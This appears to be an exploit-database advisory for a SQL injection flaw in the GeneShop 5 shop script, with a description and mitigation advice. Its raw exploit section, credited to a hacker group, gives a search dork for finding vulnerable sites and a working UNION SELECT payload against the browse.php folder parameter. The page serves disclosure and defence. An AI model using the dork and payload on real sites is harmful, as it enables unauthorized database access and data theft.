GeneShop 5 SQL Injection Vulnerability

vendor:

GeneShop 5

by:

41.w4r10r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: GeneShop 5

Affected Version From: All Earlier Versions

Affected Version To: All Earlier Versions

Patch Exists: NO

Related CWE: N/A

CPE: a:softbizscripts:gene_shop_5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache/Unix

2009

GeneShop 5 SQL Injection Vulnerability

GeneShop 5 is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The maliciously crafted request contains a payload that is designed to modify the SQL query executed by the application. This can be used to extract sensitive information from the database or to modify the data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Vendor Link : http://softbizscripts.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# Dork :  inurl:"browse.php?folder=" Powered by GeneShop 5
# Code :
---------------------------------------------------------------------------------------
############################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Harin,Jappy,Dark_Blue,sid3^3f3c7
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
############################################################################


All Earlier Version also Vulnerable


Exploited Link :

http://example.com/[path]/browse.php?folder=1'



Demo :

http://example.com/[path]/browse.php?folder=-1+union+select+1,version(),3,4,5,6--


#41.w4r10r mailto:41.w4r10r@andhrahackers.com